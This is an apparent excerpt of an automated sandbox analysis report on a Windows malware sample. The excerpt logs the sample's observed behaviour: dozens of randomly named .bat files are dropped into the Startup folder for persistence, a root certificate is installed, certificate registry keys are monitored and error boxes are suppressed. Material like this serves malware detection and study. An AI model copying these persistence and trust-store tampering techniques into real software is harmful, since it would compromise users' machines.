                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFn3QrubYABzdRE1O31cNxVg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J3V1pdpFAtBTREkflB9t911H.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TtQ59dJ4wCe89DD8HhCLHVsL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OeHnvNY8j0wZg74Dxkl5QDpP.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XyNWXmNEbpbFhVSFSSJ7vqq7.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I3tGceZE6Qqz7aE3jOU5x1I6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q6S8ZsBC4fHsfjqey8ivFoc0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2ivxKjIFzltkDEA2JxwPp8hh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CizbWvvGUnk05BM6mZJPptaz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VcZwTQ1Borjv2y0HnBVtpR2m.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rkJ56qyUQvOtS5TAPobyZHxi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lo2UTsMDlN4zzEXKzfmqog6U.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UelMq7CpriPj4R0Deq5pq0aY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I7h79OMckNXjL13vxGpugBTK.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzt8E2j9RcoJbzJ8MIBsydeQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GQ44tlM3boNlzUXxT0QJHafC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cg2pQ4fPU4UslHwqAqLJMQWF.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QUwTe3NCJpBwzD8NxUkfKAAQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nS5cv0KxCZoVbh3xRwlSlrSI.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SI6itsU6sAnMZMnJJqHHnd7l.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dzowLadr24SqEJXqVJHyXMNW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gX7SDDi52bPNdZXwweLyLeN1.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmG2OHHezvw5lLRtzgoHrYQQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\slIjYtjKFk0ddx26rsYyPbqA.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OviyK22i2Ch8KsqnWUVKswxV.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OT4z799MffsEZzReJLWf4t6c.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sYTI1WX0V1lGBTBj9GjHe3Yi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\djD1npfsDSq5SOlxLWkWdN6D.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LQHO1LtqN3NQSFZ4LWktLm0i.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7IdMRPGAE71nDcZVcCIbHHkZ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v69W3qZdpo1mlZbnQaGvo8Ux.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dPH0VGBHTFD8byNB03IQGB7h.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cnFdYJdlN19wrLCyhzGBXxh6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v95WXarcNwH61BQDwryrhtpL.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZJPqm8Ygo1dCr79KO4YrgAM8.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDWdYk8oJRLcq2DvySOueEW6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S2bK3prB40hGggYxLOYIghhE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qXaW7kWhPkNhytnUL2XiTFNC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FmhD39jqMast3ZzRLrBPBUAC.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A1bdEqwJePG1sPxQoKCReLMk.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGjbJddFYoD36777M23IWFGq.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NrvU25t7MwD1O9FUncAuqpeA.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\64lu1is5vJyGmNI1t4cnrAUu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OykzQsKd5VfmP0JwQvbGk1Hp.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gjac86xAjEUfibEzVCcy3aDX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\orpMvUaDBRX92893Q7jUVjya.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DYsRwJG6XTVcTDTkLp6UKr2V.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WMMt34ZPQ9U3E6cIBceA423q.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\93CysBjmLQCLnPNRBqpQJB0y.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5YTHvVre8Or4OD5vdy06kSKK.bat
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,14_2_00423C0C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,14_2_00423C0C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004241DC IsIconic,SetActiveWindow,SetFocus,14_2_004241DC
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00424194 IsIconic,SetActiveWindow,14_2_00424194
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,14_2_00418384
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,14_2_0042285C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00417598 IsIconic,GetCapture,14_2_00417598
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,14_2_0048393C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00417CCE IsIconic,SetWindowPos,14_2_00417CCE
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,14_2_00417CD0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,14_2_0041F118
                        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
